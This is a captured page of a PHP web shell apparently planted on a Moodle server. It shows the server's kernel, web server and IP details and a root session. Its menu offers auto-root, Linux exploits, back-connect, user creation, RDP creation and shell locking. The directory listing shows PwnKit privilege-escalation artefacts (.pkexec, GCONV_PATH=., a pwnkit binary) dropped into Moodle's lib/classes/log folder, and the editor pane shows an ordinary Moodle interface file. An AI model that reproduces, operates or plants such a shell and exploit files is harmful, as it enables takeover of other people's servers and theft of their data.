Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
classes /
log /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
dummy_manager.php
1.22
KB
-rwxrwxrwx
manager.php
1.8
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
reader.php
1.44
KB
-rwxrwxrwx
sql_internal_table_reader.php
1.55
KB
-rwxrwxrwx
sql_reader.php
2.85
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : manager.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Log storage manager interface. * * @package core * @copyright 2013 Petr Skoda {@link http://skodak.org} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ namespace core\log; defined('MOODLE_INTERNAL') || die(); /** * Interface describing log readers. * * This is intended for reports, use get_log_manager() to get * the configured instance. * * @package core */ interface manager { /** * Return list of available log readers. * * @param string $interface All returned readers must implement this interface. * * @return \core\log\reader[] */ public function get_readers($interface = null); /** * Dispose all initialised stores. * @return void */ public function dispose(); /** * For a given report, returns a list of log stores that are supported. * * @param string $component component. * * @return false|array list of logstores that support the given report. It returns false if the given $component doesn't * require logstores. */ public function get_supported_logstores($component); }
Close